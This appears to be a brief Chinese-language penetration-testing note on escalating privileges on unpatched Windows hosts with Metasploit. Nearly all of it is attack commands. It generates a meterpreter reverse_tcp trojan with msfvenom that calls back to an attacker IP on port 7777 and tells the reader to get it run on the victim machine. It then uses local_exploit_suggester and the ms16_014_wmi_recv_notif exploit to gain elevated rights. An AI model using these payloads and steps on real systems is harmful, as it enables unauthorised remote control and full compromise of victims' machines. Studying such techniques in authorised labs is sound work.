此提权⽅法是利⽤系统本身存在的⼀些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对⽐ systeminfo信息中的补丁信息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以 提权提升的exp。 注意系统跟版本号要一致
ip a
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.66 LPOR =7777 -f exe -o win7.exe
msfconsole
use exploit/multi/handler
show options
把需要该配置配置了 主机 payload 端口
run
getuid
bg sessions 查看所有后台
注意生成木马上装到受害机器上并执行它
use post/multi/recon/local_exploit_suggester
set session 1
use post/multi/recon/local_exploit_suggester
set session 1 run
yes是可能存在的 no是不存在
use exploit/windows/local/ms16_014_wmi_recv_notif
看系统对着不,不对就重新找找 对就下一步
show options
set session run getuid 查看权限 成功提权